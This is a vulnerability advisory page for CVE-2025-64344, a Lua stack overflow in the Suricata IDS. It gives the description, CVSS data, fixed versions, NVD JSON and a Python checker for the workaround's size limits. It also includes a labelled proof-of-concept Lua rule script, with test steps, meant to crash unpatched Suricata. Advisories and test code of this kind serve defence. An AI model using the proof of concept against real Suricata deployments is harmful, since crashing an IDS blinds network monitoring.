Security Vulnerability Report
CVE-2025-64344 (CVSS 7.5 HIGH)

Published: 2025-11-26 23:15:49
Last Modified: 2025-12-03 16:06:06

Description

Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, working with large buffers in Lua scripts can lead to a stack overflow. Users of Lua rules and output scripts may be affected when working with large buffers. This includes a rule passing a large buffer to a Lua script. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves disabling Lua rules and output scripts, or making sure limits, such as stream.depth.reassembly and HTTP response body limits (response-body-limit), are set to less than half the stack size.
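The workaround above is stated in terms of two size limits that must stay below half the thread stack size. The script below is an added example (not Suricata project code or part of the advisory) that turns that sentence into a check: it parses Suricata-style size strings ("100kb", "1mb", "4gb"), reads the two limits out of constructed suricata.yaml fragments, and compares each against half the stack. Assumptions, all mine: the advisory's "stream.depth.reassembly" is spelled `stream.reassembly.depth` in suricata.yaml, `response-body-limit` lives under `app-layer.protocols.http.libhtp.default-config`, Lua rules are gated by `security.lua.allow-rules`, and the packet threads inherit the process stack rlimit (8 MiB on a typical Linux host). The two YAML fragments are constructed for the example, one with limits that violate the bound and one that satisfies it.

```python
"""Check Suricata size limits against the CVE-2025-64344 workaround.

Added example, not Suricata project code. The advisory's workaround is to
keep the stream reassembly depth and the HTTP response body limit below half
the thread stack size (or to disable Lua rules/output scripts entirely).
"""
import re

# Suricata size suffixes (case-insensitive): kb, mb, gb. A bare number is bytes.
_SIZE_RE = re.compile(r"^\s*(\d+)\s*(kb|mb|gb)?\s*$", re.IGNORECASE)
_MULT = {None: 1, "kb": 1024, "mb": 1024 ** 2, "gb": 1024 ** 3}

# Constructed suricata.yaml fragments (assumed key paths, see lead-in).
# WEAK: both limits exceed half of an 8 MiB stack and Lua rules are enabled,
# so an unpatched 7.0.x / 8.0.x can hand a Lua script an oversized buffer.
WEAK_CONFIG = """
stream:
  reassembly:
    depth: 8mb
app-layer:
  protocols:
    http:
      libhtp:
        default-config:
          response-body-limit: 6mb
security:
  lua:
    allow-rules: true
"""

# HARDENED: limits well under half the stack (these are also the shipped
# defaults in suricata.yaml, as an assumption of this example) and Lua rules off.
HARDENED_CONFIG = """
stream:
  reassembly:
    depth: 1mb
app-layer:
  protocols:
    http:
      libhtp:
        default-config:
          response-body-limit: 100kb
security:
  lua:
    allow-rules: false
"""


def parse_size(text):
    """Convert a Suricata size string such as '100kb' or '1mb' to bytes."""
    m = _SIZE_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    num, unit = m.groups()
    return int(num) * _MULT[unit.lower() if unit else None]


def extract_setting(config, key):
    """Pull the scalar after `key:` out of a YAML fragment without a YAML
    library. Indentation is ignored, which is fine for these unique keys."""
    m = re.search(rf"^\s*{re.escape(key)}:\s*(\S+)\s*$", config, re.MULTILINE)
    return m.group(1) if m else None


def check_limits(config, stack_bytes):
    """Return [(key, raw_value, ok)] for each size limit, where ok means the
    configured value is strictly below half the stack (the advisory's bound)."""
    bound = stack_bytes // 2
    results = []
    for key in ("depth", "response-body-limit"):
        raw = extract_setting(config, key)
        if raw is None:
            raise ValueError(f"{key} not found in config fragment")
        results.append((key, raw, parse_size(raw) < bound))
    return results


def lua_rules_enabled(config):
    """True when security.lua.allow-rules is set to true."""
    return extract_setting(config, "allow-rules") == "true"


def thread_stack_bytes(default=8 * 1024 ** 2):
    """Soft RLIMIT_STACK, which glibc uses as the default pthread stack size
    (assumption: Suricata does not override it). Falls back to 8 MiB."""
    try:
        import resource
        soft, _hard = resource.getrlimit(resource.RLIMIT_STACK)
        return soft if soft != resource.RLIM_INFINITY else default
    except (ImportError, ValueError):
        return default


if __name__ == "__main__":
    stack = thread_stack_bytes()
    print(f"thread stack: {stack} bytes, bound: {stack // 2} bytes")
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: lua rules enabled = {lua_rules_enabled(cfg)}")
        for key, raw, ok in check_limits(cfg, stack):
            print(f"  {key} = {raw}: {'ok' if ok else 'ABOVE half the stack'}")
```

On a host where `ulimit -s` reports 8192 the bound is 4 MiB, so the weak fragment fails on both limits while the hardened one passes; with Lua rules disabled the size limits no longer matter for this issue, but they still cap how much data any other detection path buffers.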

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE, all versions before 7.0.13
cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE, versions from 8.0.0 up to but excluding 8.0.2
Fixed in: Suricata 7.0.13 and 8.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
lua
-- CVE-2025-64344 PoC - Suricata Lua stack overflow
-- Lua rule script using the Suricata 7 "lua" keyword API: init() asks
-- Suricata for the HTTP response body buffer and match() receives it in
-- args. On unpatched 7.0.x (< 7.0.13) and 8.0.x (< 8.0.2) a large enough
-- buffer handed to the script can overflow the stack.
-- Suricata 7 ships with Lua rules disabled; security.lua.allow-rules must
-- be set to true in suricata.yaml for the rule below to load.

function init(args)
    local needs = {}
    needs["http.response_body"] = tostring(true)
    return needs
end

-- Large buffer kept from the original PoC. Note that a Lua string lives on
-- the Lua heap; the overflow comes from the size of the buffer Suricata
-- passes into the script, which is why the rule requests the response body.
local function exploit_stack_overflow()
    local large_buffer = string.rep("A", 1024 * 1024 * 10) -- 10 MB buffer
    return large_buffer
end

function match(args)
    local body = args["http.response_body"]
    if body ~= nil and #body > 0 then
        exploit_stack_overflow()
        return 1
    end
    return 0
end

-- Example Suricata rule that loads the script. The response body flows to
-- the client, so the direction is to_client (the original rule said
-- to_server, which never carries a response body):
-- alert http any any -> any any (msg:"Large buffer test"; \
--   flow:established,to_client; lua:exploit.lua; sid:1000001; rev:1;)
--
-- To test:
-- 1. Configure Suricata with the Lua script and rule above
-- 2. Send HTTP traffic with a large response body (>5MB)
-- 3. Monitor for crashes or abnormal behavior
-- Note: This is for educational and testing purposes only

References

https://github.com/OISF/suricata/security/advisories/GHSA-93fh-cgmc-w3rx (GitHub security advisory)
https://github.com/OISF/suricata/commit/e13fe6a90dba210a478148c4084f6f5db17c5b5a (fix commit)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64344",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-26T23:15:49.080",
    "lastModified": "2025-12-03T16:06:06.107",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, working with large buffers in Lua scripts can lead to a stack overflow. Users of Lua rules and output scripts may be affected when working with large buffers. This includes a rule passing a large buffer to a Lua script. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves disabling Lua rules and output scripts, or making sure limits, such as stream.depth.reassembly and HTTP response body limits (response-body-limit), are set to less than half the stack size."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-121"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-787"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "7.0.13",
                "matchCriteriaId": "AA4D86E3-44A3-4B0B-9CF4-9FC88091D3C1"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.0.0",
                "versionEndExcluding": "8.0.2",
                "matchCriteriaId": "C93A731C-19AD-4067-B28C-17164C2D981D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/OISF/suricata/commit/e13fe6a90dba210a478148c4084f6f5db17c5b5a",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/OISF/suricata/security/advisories/GHSA-93fh-cgmc-w3rx",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Third Party Advisory"]
      }
    ]
  }
}